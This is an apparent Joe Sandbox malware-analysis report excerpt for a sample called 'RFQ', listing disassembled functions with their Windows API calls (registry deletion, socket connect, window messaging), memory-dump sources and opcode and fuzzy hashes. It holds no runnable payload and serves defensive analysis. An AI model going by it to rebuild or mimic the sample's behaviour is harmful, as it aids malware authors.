                                                                          Memory Dump Source
                                                                          • Source File: 00000001.00000002.1283754821.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000001.00000002.1283737685.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000001.00000002.1283809209.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000001.00000002.1283827385.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000001.00000002.1283846379.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000001.00000002.1283864919.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000001.00000002.1283864919.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000001.00000002.1283901582.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_1_2_400000_RFQ.jbxd
                                                                          Similarity
                                                                          • API ID: AsyncState$ClientCursorLongScreenWindow
                                                                          • String ID:
                                                                          • API String ID: 3539004672-0
                                                                          • Opcode ID: 47775ca2c9d3ed855d965de7f9cc13cd0d0477b61ed95063c4b58fcc2d2fd159
                                                                          • Instruction ID: 60090bce41a6de58f2ab96a8453d1e3558661e38fd0c916b19f374a884add038
                                                                          • Opcode Fuzzy Hash: 47775ca2c9d3ed855d965de7f9cc13cd0d0477b61ed95063c4b58fcc2d2fd159
                                                                          • Instruction Fuzzy Hash: 49414C74504204BBDB24CF65C884EEFBBB8EB46326F60464EFC6593281CB34A944CB68
                                                                          Function 0047D40F Relevance: 7.6, APIs: 5, Instructions: 120sleepCOMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          • InterlockedIncrement.KERNEL32(004A7F04), ref: 0047D438
                                                                          • InterlockedDecrement.KERNEL32(004A7F04), ref: 0047D44D
                                                                          • Sleep.KERNEL32(0000000A), ref: 0047D455
                                                                          • InterlockedIncrement.KERNEL32(004A7F04), ref: 0047D460
                                                                          • InterlockedDecrement.KERNEL32(004A7F04), ref: 0047D56A
                                                                          Memory Dump Source
                                                                          • Source File: 00000001.00000002.1283754821.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000001.00000002.1283737685.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000001.00000002.1283809209.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000001.00000002.1283827385.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000001.00000002.1283846379.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000001.00000002.1283864919.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000001.00000002.1283864919.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000001.00000002.1283901582.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_1_2_400000_RFQ.jbxd
                                                                          Similarity
                                                                          • API ID: Interlocked$DecrementIncrement$Sleep
                                                                          • String ID:
                                                                          • API String ID: 327565842-0
                                                                          • Opcode ID: a05157aca8d30d558f467c32ec822d8ac937f36e77973d55cccdaa836f381863
                                                                          • Instruction ID: e00c67d4cb89bf1d5311357fb713975cbca1e0cfcee7190b0451066ade77f289
                                                                          • Opcode Fuzzy Hash: a05157aca8d30d558f467c32ec822d8ac937f36e77973d55cccdaa836f381863
                                                                          • Instruction Fuzzy Hash: CC412571A002055FEB10DF65CD84AEE7774EF45304B10852EF609A7351E738EE46CB99
                                                                          Function 0045C3C1 Relevance: 7.6, APIs: 5, Instructions: 118COMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          • GetPrivateProfileSectionW.KERNEL32(00000000,?,?,00007FFF), ref: 0045C44F
                                                                          • GetPrivateProfileSectionW.KERNEL32(00000000,00000003,?,00000003), ref: 0045C477
                                                                          • WritePrivateProfileSectionW.KERNEL32(00000000,00000003,?), ref: 0045C4C3
                                                                          • WritePrivateProfileStringW.KERNEL32(00000000,?,00000000,00000000), ref: 0045C4E7
                                                                          • WritePrivateProfileStringW.KERNEL32(00000000,00000000,00000000,?), ref: 0045C4F6
                                                                          Memory Dump Source
                                                                          • Source File: 00000001.00000002.1283754821.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000001.00000002.1283737685.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000001.00000002.1283809209.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000001.00000002.1283827385.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000001.00000002.1283846379.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000001.00000002.1283864919.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000001.00000002.1283864919.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000001.00000002.1283901582.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_1_2_400000_RFQ.jbxd
                                                                          Similarity
                                                                          • API ID: PrivateProfile$SectionWrite$String
                                                                          • String ID:
                                                                          • API String ID: 2832842796-0
                                                                          • Opcode ID: a5613791a7b7745f301c2db32c82459f4eb77f00fff265897707edd8741bbf57
                                                                          • Instruction ID: 1eb5009190fa999c36a74edd43b7bd9b51adbc8f8691a9c3f5840d50e9073e8b
                                                                          • Opcode Fuzzy Hash: a5613791a7b7745f301c2db32c82459f4eb77f00fff265897707edd8741bbf57
                                                                          • Instruction Fuzzy Hash: D1413075A00209BFDB10EFA1DC85FAAB7A8BF44305F10855EF9049B292DA79EE44CB54
                                                                          Function 00441C7B Relevance: 7.6, APIs: 5, Instructions: 108registryCOMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          • RegEnumKeyExW.ADVAPI32(?,00000000,?,?,00000000,00000000,00000000,?), ref: 00441CA9
                                                                          • RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?), ref: 00441CDD
                                                                          • RegCloseKey.ADVAPI32(?), ref: 00441CFE
                                                                          • RegDeleteKeyW.ADVAPI32(?,?), ref: 00441D40
                                                                          • RegEnumKeyExW.ADVAPI32(?,00000000,?,000000FF,00000000,00000000,00000000,?), ref: 00441D6E
                                                                          Memory Dump Source
                                                                          • Source File: 00000001.00000002.1283754821.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000001.00000002.1283737685.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000001.00000002.1283809209.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000001.00000002.1283827385.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000001.00000002.1283846379.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000001.00000002.1283864919.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000001.00000002.1283864919.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000001.00000002.1283901582.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_1_2_400000_RFQ.jbxd
                                                                          Similarity
                                                                          • API ID: Enum$CloseDeleteOpen
                                                                          • String ID:
                                                                          • API String ID: 2095303065-0
                                                                          • Opcode ID: d2ce045a3c5b7a9f88abc7d1956311aab30076c6419bcb4202e5cbde6d6cad15
                                                                          • Instruction ID: 7ca4c7ada97503ad9332fce322fe5d5fc03c2789ff93db080e75f28165cdf273
                                                                          • Opcode Fuzzy Hash: d2ce045a3c5b7a9f88abc7d1956311aab30076c6419bcb4202e5cbde6d6cad15
                                                                          • Instruction Fuzzy Hash: 69317CB2940108BAEB10DBD4DC85FFEB77CEB49304F04456EF605A7241D774AA858BA8
                                                                          Function 00436A0B Relevance: 7.6, APIs: 5, Instructions: 103COMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          • GetWindowRect.USER32(?,?), ref: 00436A24
                                                                          Memory Dump Source
                                                                          • Source File: 00000001.00000002.1283754821.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000001.00000002.1283737685.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000001.00000002.1283809209.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000001.00000002.1283827385.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000001.00000002.1283846379.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000001.00000002.1283864919.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000001.00000002.1283864919.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000001.00000002.1283901582.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_1_2_400000_RFQ.jbxd
                                                                          Similarity
                                                                          • API ID: RectWindow
                                                                          • String ID:
                                                                          • API String ID: 861336768-0
                                                                          • Opcode ID: d215e6d8dffd18d1ffc2da0b67cce38d66530bec6329dda4924901d83a0034d3
                                                                          • Instruction ID: 0a42da3bb0701689e96ef39581243ed39d97d4ba46bd7cd8c1f057aae640e0d3
                                                                          • Opcode Fuzzy Hash: d215e6d8dffd18d1ffc2da0b67cce38d66530bec6329dda4924901d83a0034d3
                                                                          • Instruction Fuzzy Hash: E531EA7160021EAFDB00DF68D988AAE77A5EB49324F11C62AFD24E7380D774EC11CB90
                                                                          Function 00449555 Relevance: 7.6, APIs: 5, Instructions: 96windowCOMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          • SendMessageW.USER32 ref: 00449598
                                                                            • Part of subcall function 00430626: _wcspbrk.LIBCMT ref: 00430636
                                                                          • SendMessageW.USER32(?,00001074,?,?), ref: 004495F8
                                                                          • _wcslen.LIBCMT ref: 0044960D
                                                                          • _wcslen.LIBCMT ref: 0044961A
                                                                          • SendMessageW.USER32(?,00001074,?,?), ref: 0044964E
                                                                          Memory Dump Source
                                                                          • Source File: 00000001.00000002.1283754821.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000001.00000002.1283737685.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000001.00000002.1283809209.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000001.00000002.1283827385.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000001.00000002.1283846379.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000001.00000002.1283864919.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000001.00000002.1283864919.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000001.00000002.1283901582.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_1_2_400000_RFQ.jbxd
                                                                          Similarity
                                                                          • API ID: MessageSend$_wcslen$_wcspbrk
                                                                          • String ID:
                                                                          • API String ID: 1856069659-0
                                                                          • Opcode ID: eb2345d78995945919f1fca8909d98cd083db74a4e9b61e28a7ea2bcab757230
                                                                          • Instruction ID: 683be220b4a5e9d86ccbf412c3bd2f13dbb60120779f28b1c577ab6eeef24407
                                                                          • Opcode Fuzzy Hash: eb2345d78995945919f1fca8909d98cd083db74a4e9b61e28a7ea2bcab757230
                                                                          • Instruction Fuzzy Hash: 77318F71A00218ABEB20DF59DC80BDFB374FF94314F10466AFA0497280E7B59D958B94
                                                                          Function 004478AC Relevance: 7.6, APIs: 5, Instructions: 96windowCOMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          • GetCursorPos.USER32(?), ref: 004478E2
                                                                          • TrackPopupMenuEx.USER32(00000000,00000000,?,?,?,00000000), ref: 004478FC
                                                                          • DefDlgProcW.USER32(?,0000007B,?,?), ref: 0044791D
                                                                          • GetCursorPos.USER32(00000000), ref: 0044796A
                                                                          • TrackPopupMenuEx.USER32(03046470,00000000,00000000,?,?,00000000), ref: 00447991
                                                                          Memory Dump Source
                                                                          • Source File: 00000001.00000002.1283754821.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000001.00000002.1283737685.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000001.00000002.1283809209.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000001.00000002.1283827385.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000001.00000002.1283846379.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000001.00000002.1283864919.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000001.00000002.1283864919.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000001.00000002.1283901582.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_1_2_400000_RFQ.jbxd
                                                                          Similarity
                                                                          • API ID: CursorMenuPopupTrack$Proc
                                                                          • String ID:
                                                                          • API String ID: 1300944170-0
                                                                          • Opcode ID: 3a0c1b1e924032964aae082f89503a6e76aba0c647238f1368234d9f75c94910
                                                                          • Instruction ID: 8079d3ea29232e2d8a780d7c6517a0c600664366e77620ab1eef72d1e193e80f
                                                                          • Opcode Fuzzy Hash: 3a0c1b1e924032964aae082f89503a6e76aba0c647238f1368234d9f75c94910
                                                                          • Instruction Fuzzy Hash: EF31CF75600108AFE724CF59DC88FABB768EB89310F20455AF94587391C775AC53CBA8
                                                                          Function 004479A0 Relevance: 7.6, APIs: 5, Instructions: 96COMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          • GetClientRect.USER32(?,?), ref: 004479CC
                                                                          • GetCursorPos.USER32(?), ref: 004479D7
                                                                          • ScreenToClient.USER32(?,?), ref: 004479F3
                                                                          • WindowFromPoint.USER32(?,?), ref: 00447A34
                                                                          • DefDlgProcW.USER32(?,00000020,?,?), ref: 00447AAD
                                                                          Memory Dump Source
                                                                          • Source File: 00000001.00000002.1283754821.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000001.00000002.1283737685.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000001.00000002.1283809209.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000001.00000002.1283827385.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000001.00000002.1283846379.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000001.00000002.1283864919.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000001.00000002.1283864919.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000001.00000002.1283901582.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_1_2_400000_RFQ.jbxd
                                                                          Similarity
                                                                          • API ID: Client$CursorFromPointProcRectScreenWindow
                                                                          • String ID:
                                                                          • API String ID: 1822080540-0
                                                                          • Opcode ID: 0f9a8e9b3e4e036e66763aee309a2391e7a5810cceb8633c4940fa55a949c157
                                                                          • Instruction ID: a7e7621e8492875af53c289f1ad187460d50aec5ad556b3834d9a5cb4abdf121
                                                                          • Opcode Fuzzy Hash: 0f9a8e9b3e4e036e66763aee309a2391e7a5810cceb8633c4940fa55a949c157
                                                                          • Instruction Fuzzy Hash: B831A2741082029FE710DF69D884D7FB7A4FB89314F144A1EF850D7291D774E946CBA6
                                                                          Function 00447BF1 Relevance: 7.6, APIs: 5, Instructions: 95COMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          • GetWindowRect.USER32(?,?), ref: 00447C5D
                                                                          • ScreenToClient.USER32(?,?), ref: 00447C7B
                                                                          • SetViewportOrgEx.GDI32(00000000,?,?,00000000), ref: 00447C8E
                                                                          • Rectangle.GDI32(00000000,00000000,00000000,?,?), ref: 00447CD5
                                                                          • EndPaint.USER32(?,?), ref: 00447D13
                                                                          Memory Dump Source
                                                                          • Source File: 00000001.00000002.1283754821.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000001.00000002.1283737685.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000001.00000002.1283809209.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000001.00000002.1283827385.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000001.00000002.1283846379.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000001.00000002.1283864919.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000001.00000002.1283864919.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000001.00000002.1283901582.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_1_2_400000_RFQ.jbxd
                                                                          Similarity
                                                                          • API ID: ClientPaintRectRectangleScreenViewportWindow
                                                                          • String ID:
                                                                          • API String ID: 659298297-0
                                                                          • Opcode ID: 9df24dda7700d3462e91b7be9c0077b8f1985bebde9900174ed076ebcab1caeb
                                                                          • Instruction ID: 3c0582d8bc81ba5dadaaf244cb1f1d3939805113443e317e1f98b5bdeebaec33
                                                                          • Opcode Fuzzy Hash: 9df24dda7700d3462e91b7be9c0077b8f1985bebde9900174ed076ebcab1caeb
                                                                          • Instruction Fuzzy Hash: C33161706043019FE310CF25D8C8F7B7BE8EB86724F144A6EF9A5872A1C774A845DB69
                                                                          Function 004487EA Relevance: 7.6, APIs: 5, Instructions: 89COMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          • EnableWindow.USER32(?,00000000), ref: 00448B5C
                                                                          • EnableWindow.USER32(?,00000001), ref: 00448B72
                                                                          • ShowWindow.USER32(?,00000000), ref: 00448BE8
                                                                          • ShowWindow.USER32(?,00000004), ref: 00448BF4
                                                                          • EnableWindow.USER32(?,00000001), ref: 00448C09
                                                                            • Part of subcall function 00440D98: SendMessageW.USER32(?,000000F0,00000000,00000000), ref: 00440DB8
                                                                            • Part of subcall function 00440D98: GetWindowLongW.USER32(?,000000F0), ref: 00440DFA
                                                                            • Part of subcall function 00440D98: GetWindowLongW.USER32(?,000000F0), ref: 00440E3A
                                                                            • Part of subcall function 00440D98: SendMessageW.USER32(03041C90,000000F1,00000000,00000000), ref: 00440E6E
                                                                            • Part of subcall function 00440D98: SendMessageW.USER32(03041C90,000000F1,00000001,00000000), ref: 00440E9A
                                                                          Memory Dump Source
                                                                          • Source File: 00000001.00000002.1283754821.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000001.00000002.1283737685.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000001.00000002.1283809209.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000001.00000002.1283827385.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000001.00000002.1283846379.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000001.00000002.1283864919.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000001.00000002.1283864919.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000001.00000002.1283901582.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_1_2_400000_RFQ.jbxd
                                                                          Similarity
                                                                          • API ID: Window$EnableMessageSend$LongShow
                                                                          • String ID:
                                                                          • API String ID: 142311417-0
                                                                          • Opcode ID: 426854c6b9cbeb660193a9c091743316caa306963ba13d8f93245475b3a006f2
                                                                          • Instruction ID: c941ec4e4e3d0536419715940b2668e48b64c275bb9f23e9dd6fd7b29375311a
                                                                          • Opcode Fuzzy Hash: 426854c6b9cbeb660193a9c091743316caa306963ba13d8f93245475b3a006f2
                                                                          • Instruction Fuzzy Hash: DE21F7B17443805BF7258E24CCC4BAFB7D0EF56345F08482EF98196391DBACA885C75A
                                                                          Function 004550FC Relevance: 7.6, APIs: 5, Instructions: 78COMMON
                                                                          Download Yara Rule
                                                                          Memory Dump Source
                                                                          • Source File: 00000001.00000002.1283754821.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000001.00000002.1283737685.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000001.00000002.1283809209.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000001.00000002.1283827385.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000001.00000002.1283846379.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000001.00000002.1283864919.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000001.00000002.1283864919.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000001.00000002.1283901582.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_1_2_400000_RFQ.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: cfa96c7b92ceffa4878489be5d10f88277f639196488ca8149908940c9a32487
                                                                          • Instruction ID: af34b986bc09d21a6a739d25b45c5a22770885c200d938a8bd6fc5fff5094107
                                                                          • Opcode Fuzzy Hash: cfa96c7b92ceffa4878489be5d10f88277f639196488ca8149908940c9a32487
                                                                          • Instruction Fuzzy Hash: 5921AE75200600DBC710EF29E9D496B77B9EF49362B00466EFE5197392DB34EC09CB69
                                                                          Function 00445870 Relevance: 7.6, APIs: 5, Instructions: 78windowCOMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          • IsWindowVisible.USER32(?), ref: 00445879
                                                                          • SendMessageW.USER32(?,0000000E,00000000,00000000), ref: 00445893
                                                                          • SendMessageW.USER32(?,0000000D,00000001,00000000), ref: 004458CD
                                                                          • _wcslen.LIBCMT ref: 004458FB
                                                                          • CharUpperBuffW.USER32(00000000,00000000), ref: 00445905
                                                                          Memory Dump Source
                                                                          • Source File: 00000001.00000002.1283754821.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000001.00000002.1283737685.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000001.00000002.1283809209.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000001.00000002.1283827385.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000001.00000002.1283846379.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000001.00000002.1283864919.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000001.00000002.1283864919.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000001.00000002.1283901582.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_1_2_400000_RFQ.jbxd
                                                                          Similarity
                                                                          • API ID: MessageSend$BuffCharUpperVisibleWindow_wcslen
                                                                          • String ID:
                                                                          • API String ID: 3087257052-0
                                                                          • Opcode ID: 622372a4a32610ce73fb3647056b26e365a1681bd10d6cc102ac189a3bd4553b
                                                                          • Instruction ID: ced771b0f23340e5f55e8fdbc4e1763ce6d97a07fd0b425722e47bce61cb145a
                                                                          • Opcode Fuzzy Hash: 622372a4a32610ce73fb3647056b26e365a1681bd10d6cc102ac189a3bd4553b
                                                                          • Instruction Fuzzy Hash: F51136726009017BFB10AB25DC06F9FB78CAF65360F04403AF909D7241EB69ED5983A9
                                                                          Function 004653C8 Relevance: 7.6, APIs: 5, Instructions: 72networkCOMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                            • Part of subcall function 00465225: inet_addr.WSOCK32(?), ref: 00465249
                                                                          • socket.WSOCK32(00000002,00000001,00000006,00000000), ref: 004653FE
                                                                          • WSAGetLastError.WSOCK32(00000000), ref: 0046540D
                                                                          • connect.WSOCK32(00000000,?,00000010), ref: 00465446
                                                                          • WSAGetLastError.WSOCK32(00000000), ref: 0046546D
                                                                          • closesocket.WSOCK32(00000000,00000000), ref: 00465481
                                                                          Memory Dump Source
                                                                          • Source File: 00000001.00000002.1283754821.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000001.00000002.1283737685.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000001.00000002.1283809209.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000001.00000002.1283827385.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000001.00000002.1283846379.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000001.00000002.1283864919.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000001.00000002.1283864919.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000001.00000002.1283901582.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_1_2_400000_RFQ.jbxd
                                                                          Similarity
                                                                          • API ID: ErrorLast$closesocketconnectinet_addrsocket
                                                                          • String ID:
                                                                          • API String ID: 245547762-0
                                                                          • Opcode ID: 4a364c3b246f50765ea579ebeb5236c2c367babb38bf5793ee33ccca847a6907
                                                                          • Instruction ID: 0a95abeaf907522bb910ccff47ca5b8cdb65f95d12881c86cce1eb50970c9d0a
                                                                          • Opcode Fuzzy Hash: 4a364c3b246f50765ea579ebeb5236c2c367babb38bf5793ee33ccca847a6907
                                                                          • Instruction Fuzzy Hash: E921F032200510ABD310EF29DC49F6EB7E8EF44725F008A6FF844E72D1DBB4A8418B99
                                                                          Function 0044719B Relevance: 7.6, APIs: 5, Instructions: 70COMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          • DeleteObject.GDI32(00000000), ref: 004471D8
                                                                          • ExtCreatePen.GDI32(?,?,?,00000000,00000000), ref: 00447218
                                                                          • SelectObject.GDI32(?,00000000), ref: 00447228
                                                                          • BeginPath.GDI32(?), ref: 0044723D
                                                                          • SelectObject.GDI32(?,00000000), ref: 00447266
                                                                          Memory Dump Source
                                                                          • Source File: 00000001.00000002.1283754821.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000001.00000002.1283737685.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000001.00000002.1283809209.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000001.00000002.1283827385.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000001.00000002.1283846379.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000001.00000002.1283864919.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000001.00000002.1283864919.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000001.00000002.1283901582.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_1_2_400000_RFQ.jbxd
                                                                          Similarity
                                                                          • API ID: Object$Select$BeginCreateDeletePath
                                                                          • String ID:
                                                                          • API String ID: 2338827641-0
                                                                          • Opcode ID: 2b4904aa023ab9776d85036867689c5727337e5a2013c968bceed19ab76b7b02
                                                                          • Instruction ID: fd3aca4fc88a528095528039be3f852d236b7ebb9f74560e76bd8f11b15fbd2f
                                                                          • Opcode Fuzzy Hash: 2b4904aa023ab9776d85036867689c5727337e5a2013c968bceed19ab76b7b02
